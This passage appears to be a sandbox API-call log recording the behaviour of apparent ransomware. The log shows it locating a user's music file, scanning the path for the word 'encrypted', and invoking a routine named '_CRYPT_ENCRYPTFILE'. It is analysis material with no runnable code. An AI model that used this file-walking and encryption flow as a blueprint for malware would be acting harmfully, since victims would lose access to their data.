(in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.932] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa51e1a00, ftCreationTime.dwHighDateTime=0x1d5b89c, ftLastAccessTime.dwLowDateTime=0x731a870, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x731a870, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0x3d1d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="fxfiITiq48pQW.mp3", cAlternateFileName="FXFIIT~1.MP3")) returned 0x7c20c0 [0037.933] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0037.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.934] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.934] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa51e1a00, ftCreationTime.dwHighDateTime=0x1d5b89c, ftLastAccessTime.dwLowDateTime=0x731a870, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x731a870, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0x3d1d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="fxfiITiq48pQW.mp3", cAlternateFileName="FXFIIT~1.MP3")) returned 0x7c20c0 [0037.934] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0037.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.935] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oSCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SCes8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ces8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fxfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xfiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fiITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ITiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tiq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iq48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="48pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8pQW.mp3\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c20c0 [0037.937] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.938] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5f8 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.938] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0037.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb20 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.938] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 